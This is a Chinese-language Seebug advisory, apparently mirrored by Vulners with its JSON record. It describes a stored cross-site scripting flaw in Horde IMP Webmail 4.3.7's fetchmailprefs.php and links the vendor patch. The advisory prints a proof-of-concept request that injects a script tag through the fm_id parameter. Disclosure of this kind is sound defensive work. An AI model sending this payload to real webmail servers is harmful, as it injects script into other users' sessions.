Search...

Horde IMP Webmail fetchmailprefs.php存储式跨站脚本漏洞

2010-09-30T00:00:00

ID SSV:20137
Type seebug
Reporter Root
Modified 2010-09-30T00:00:00

Description

BUGTRAQ ID: 43515

IMP是一款基于Web的强大的邮件程序，由Horde项目组开发，可使用在Linux/Unix或者Windows操作系统下。

IMP Webmail没有正确地过滤提交给fetchmailprefs.php脚本的fm_id URL参数，远程攻击者可以通过提交恶意URL请求执行存储式跨站脚本攻击。当用户访问邮件获取偏好页面时就会执行所注入的代码。

Horde IMP 4.3.7 厂商补丁：

Horde

目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://git.horde.org/diff.php/imp/fetchmailprefs.php?rt=horde&r1=1.39.4.10&r2=1.39.4.11

                                        
                                            
                                                [path_to_horde_imp]/fetchmailprefs.php?actionID=fetchmail_prefs_save&amp;fm_driver=imap&amp;fm_id=zzz%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%3Cx+y%3D%22&amp;fm_protocol=pop3&amp;fm_lmailbox=INBOX&amp;save=Create

JSON Vulners Source

Initial Source

{"sourceData": "\n [path_to_horde_imp]/fetchmailprefs.php?actionID=fetchmail_prefs_save&fm_driver=imap&fm_id=zzz%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%3Cx+y%3D%22&fm_protocol=pop3&fm_lmailbox=INBOX&save=Create\n ", "status": "poc,details", "history": [], "description": "BUGTRAQ ID: 43515\r\n\r\nIMP\u662f\u4e00\u6b3e\u57fa\u4e8eWeb\u7684\u5f3a\u5927\u7684\u90ae\u4ef6\u7a0b\u5e8f\uff0c\u7531Horde\u9879\u76ee\u7ec4\u5f00\u53d1\uff0c\u53ef\u4f7f\u7528\u5728Linux/Unix\u6216\u8005Windows\u64cd\u4f5c\u7cfb\u7edf\u4e0b\u3002\r\n\r\nIMP Webmail\u6ca1\u6709\u6b63\u786e\u5730\u8fc7\u6ee4\u63d0\u4ea4\u7ed9fetchmailprefs.php\u811a\u672c\u7684fm_id URL\u53c2\u6570\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u63d0\u4ea4\u6076\u610fURL\u8bf7\u6c42\u6267\u884c\u5b58\u50a8\u5f0f\u8de8\u7ad9\u811a\u672c\u653b\u51fb\u3002\u5f53\u7528\u6237\u8bbf\u95ee\u90ae\u4ef6\u83b7\u53d6\u504f\u597d\u9875\u9762\u65f6\u5c31\u4f1a\u6267\u884c\u6240\u6ce8\u5165\u7684\u4ee3\u7801\u3002\n\nHorde IMP 4.3.7\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nHorde\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://git.horde.org/diff.php/imp/fetchmailprefs.php?rt=horde&r1=1.39.4.10&r2=1.39.4.11", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20137", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-20137", "type": "seebug", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "viewCount": 1, "references": [], "lastseen": "2017-11-19T18:07:51", "published": "2010-09-30T00:00:00", "objectVersion": "1.4", "cvelist": [], "id": "SSV:20137", "enchantments_done": [], "modified": "2010-09-30T00:00:00", "title": "Horde IMP Webmail fetchmailprefs.php\u5b58\u50a8\u5f0f\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2017-11-19T18:07:51"}, "dependencies": {"references": [], "modified": "2017-11-19T18:07:51"}, "vulnersScore": -0.4}, "_object_type": "robots.models.seebug.SeebugBulletin"}